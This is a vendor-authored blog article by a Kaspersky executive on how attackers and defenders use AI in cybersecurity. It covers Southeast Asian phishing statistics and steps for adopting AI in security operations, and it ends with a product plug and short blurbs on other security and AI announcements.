Harnessing AI in cybersecurity: how companies can stay ahead of AI-driven threats

By Simon Tung, GM for ASEAN and Asia Emerging Countries (AEC), Kaspersky

While cybersecurity companies leverage AI to enhance threat detection, cybercriminals are weaponising the same technology for automated phishing and malware attacks — highlighted by the fact that 43% of organisations believe hackers are using AI-driven methods to boost their effectiveness. To stay protected, organisations must adopt AI-powered platforms rather than relying on isolated tools.

AI has firmly established its presence in enterprise cybersecurity. According to data from Kaspersky’s 2026 global study, almost 100% of organisations in the Asia-Pacific region (APAC) – including firms in markets like Singapore, Indonesia and Vietnam - intend to incorporate AI into security operations. This is consistent with solution providers embedding AI into their workflows to accelerate detection, reduce analyst workload and counter-attacks that move faster than human responders can manage. 

On the other hand, cybercriminals are using it to automate reconnaissance, generate convincing phishing content and scale operations that would previously have required significant resources and expertise.

This symmetry is the challenge. Every AI-driven capability available to cybersecurity providers is also available, or adaptable, to attackers. According to Kaspersky data, 21% of organisations believe cybercriminals are ahead in the technology arms race, with 43% saying criminals are able to adopt new technologies like AI to increase the effectiveness of their attacks.

Security leaders need to understand how AI is being weaponised, invest in AI-powered protection that is genuinely integrated into daily security workflows, and approach the organisational and technical challenges of AI implementation with the same rigour applied to any critical infrastructure decision.

AI-based threats: how cybercriminals are using AI

The adoption of AI by threat actors is systematic. Attackers are integrating generative AI across the full attack chain: automating the creation of phishing lures, generating functional malicious code, improving the evasiveness of payloads and making social engineering more convincing at scale. What previously required skilled human operators can now be replicated and scaled cheaply. 

Kaspersky’s Global Research and Analysis Team (GReAT) documented this shift in detail through its investigation of the RevengeHotels campaign, which targeted hospitality businesses across Latin America. Threat actors incorporated AI-generated code into their malware development and delivery process, producing more convincing phishing content and more evasive payloads than earlier iterations of the campaign. 

The financial sector has also felt the impact directly. In 2025, Kaspersky logged more than 530,000 attempted financial phishing attacks across Southeast Asia, with Thailand recording the highest number of attacks at 247,560, Indonesia at 85,908, Malaysia at 64,779, Vietnam at 59,560, as well as Singapore and the Philippines recording just over 38,000 each. 

Furthermore, Kaspersky’s analysis of financial threat trends in 2025 identified AI as a key enabler of increasingly targeted fraud, social engineering and market manipulation attempts, with attackers using AI to model victim behaviour, craft more persuasive lures and probe infrastructure at a pace and scale that manual methods cannot match. 

The entertainment industry tells a similar story. Kaspersky identified AI as the thread running through the most significant emerging risks facing studios, content platforms and rights holders in 2026, from AI-generated deepfakes and content fraud to AI-assisted probing of content delivery infrastructure. 

The common thread across these threat scenarios is speed and scale. AI removes the manual bottlenecks that previously constrained attackers, compressing the time between reconnaissance and compromise, between identifying a target and deploying a convincing lure, and between creating a payload and adapting it to evade detection. 

For defenders, the response time advantage that once existed is eroding. 

AI-based protection: how security vendors are responding 

The cybersecurity industry has responded to the AI threat landscape by embedding AI throughout the detection and response lifecycle. 

AI has the potential to deliver wide-ranging advantages. For instance, behavioural correlation rules can be used to establish a baseline of normal login activity and automatically flag anomalous events, triggering account theft alerts without requiring manual analyst review of individual log entries. AI-powered asset scoring can continuously evaluate for risk based on the sequence and context of detected security events across the infrastructure. Assets with unusual or correlated patterns receive elevated risk scores and are automatically categorised by severity, helping teams focus limited resources where exposure is greatest.

In addition, AI-enabled incident summarisation can explain the attack chain, initial vector and adversary actions in plain language. Analysts can use this to immediately understand what happened without manually reviewing large volumes of raw event data, directly addressing the investigation bottleneck that strains under-resourced security operations centre (SOC) teams. 

Meanwhile, AI-based assistants can deobfuscate command lines, provide analytical explanations and produce concise investigation reports, reducing cognitive load and accelerating analysis, especially in complex, multi-stage incidents.

AI implementation in infrastructure: challenges and key steps

According to the aforementioned 2026 global Kaspersky survey, nearly every company across Southeast Asia planning to establish a SOC within the next two years intends to enhance it with AI. However, many of these organisations face a distinct set of organisational and technical challenges when integrating this technology into their security infrastructure, and approaching these challenges without a clear framework risks compounding the very problems AI is meant to solve.

Data quality and telemetry coverage: AI detection and correlation capabilities are only as effective as the data they operate on. Fragmented architectures with siloed data sources produce inconsistent telemetry that limits AI effectiveness. Organisations must prioritise centralised data collection across endpoints, identity, cloud and network before AI-driven correlation can deliver meaningful results.

Integration complexity and total cost of ownership: AI capabilities introduced as isolated features within fragmented stacks add integration overhead without delivering unified operational benefit. Infrastructure requirements, API complexity and ongoing model tuning can multiply initial investment costs significantly. Enterprises should evaluate AI security capabilities not by feature lists but by how effectively the underlying platform consolidates telemetry, eliminates manual context-switching and reduces total operational burden.

Skill gaps and change management: AI tools that require deep technical configuration to operate effectively may widen rather than narrow capability gaps in under-resourced teams. The most operationally-effective AI implementations are those that embed intelligence directly into analyst workflows.

Responsible AI governance: As AI becomes embedded in security operations, enterprises must also consider the governance framework governing those tools. 

The practical steps for organisations navigating AI integration are as follows:

- Consolidate telemetry into a unified platform before layering AI capabilities. Fragmented data limits AI effectiveness

- Evaluate AI security tools based on workflow integration, not feature count. The measure is analyst time saved, not capabilities listed

- Prioritise platforms where AI capabilities are built-in rather than bolted on, to minimise integration overhead and reduce total cost of ownership (TCO)

- Establish internal AI governance standards that align with emerging regulatory requirements and vendor accountability frameworks

- Run phased deployments with measurable outcome baselines to validate AI impact before full-scale rollout

Building a resilient AI strategy

The question for enterprise security leaders is not whether to engage with AI, but how to implement it in a way that delivers genuine operational benefit rather than added complexity. As enthusiastic as Southeast Asian markets like Singapore have been on AI adoption, the workforce is being inundated by AI-enabled cyberthreats. Employers still face significant technical gaps – ones that impede business operations.

The answer lies in integration. AI capabilities that operate in isolation, or that require significant manual configuration to function, add overhead without reducing risk. AI embedded directly into unified detection and response workflows is where the operational gains are realised. 

Editor's note: The Kaspersky Next Expert product line has AI embedded across detection, investigation and response within a unified platform designed to scale with enterprise environments. 

Comments

Post a Comment

Popular posts from this blog

Fortinet enhances FortiRecon to align with CTEM framework

Fortinet, the global cybersecurity provider driving the convergence of networking and security, has turned the FortiRecon platform into a comprehensive solution aligned with the continuous threat exposure management (CTEM) framework. The latest release introduces expanded internal attack surface monitoring, adversary-centric dark web intelligence, and security orchestration, all in a unified platform. These enhancements help organisations proactively identify and prioritise real-world exposures, validate risks like an attacker would, and accelerate response. “CISOs and security teams are overwhelmed by growing attack surfaces and an endless stream of unprioritised alerts,” said Nirav Shah, Senior VP of Products and Solutions at Fortinet. “With the latest enhancements to FortiRecon , we’re giving organisations an attacker’s eye view of their internal and external exposures, backed by AI-powered threat intelligence from FortiGuard Labs, real-world validation, and automated response...
Read more

SentinelOne recognised as a 2025 Gartner Peer Insights Customers’ Choice for XDR

SentinelOne, a global provider of AI-powered security, has been named a Customers’ Choice in the 2025 Gartner Peer Insights ‘Voice of the Customer’ for Extended Detection and Response (XDR) report* – one of only two companies with this distinction. A hundred and forty-four users reviewed SentinelOne's Singularity Platform, and 97% said they would recommend the solution to respond to threats across endpoints with AI-powered security, while 97% rated the solution four stars or better.** “With the growing complexity of cyberthreats, organisations need more than siloed security—they need AI-powered, autonomous protection that delivers real-time detection and response across their entire attack surface. Customers have made it clear that SentinelOne’s XDR provides the intelligence, automation, and efficiency they need to stay ahead of threats and secure their environments with confidence,” said Ely Kahn, VP, Product Management, SentinelOne. Gartner defines extended detection and ...
Read more

NVIDIA unveils multi-agent intelligent warehouse and catalogue enrichment AI blueprints

Image
Source: NVIDIA blog post. Harnessing the  Retail Catalog Enrichment NVIDIA Blueprint (left) and the  Multi-Agent Intelligent Warehouse Blueprint (right). Ageing retail systems, siloed data and rising customer expectations can now be addressed with NVIDIA's Multi-Agent Intelligent Warehouse (MAIW) and Retail Catalog Enrichment NVIDIA Blueprints . These open-source developer references empower developers to customise AI-powered solutions for the retail value chain. “Building with these blueprints will reduce the cost of integration and help our customers and partners enable applications fast,” said Tarik Hammadou, Director of developer relations for AI for retail and consumer packaged goods at NVIDIA. “They unlock the efficiency and enterprise‑grade scale the retail industry needs to compete.” The NVIDIA MAIW blueprint delivers AI support that sits above existing warehouse management systems, enterprise resource planning (ERP), robotics and Internet of Things (IoT) data...
Read more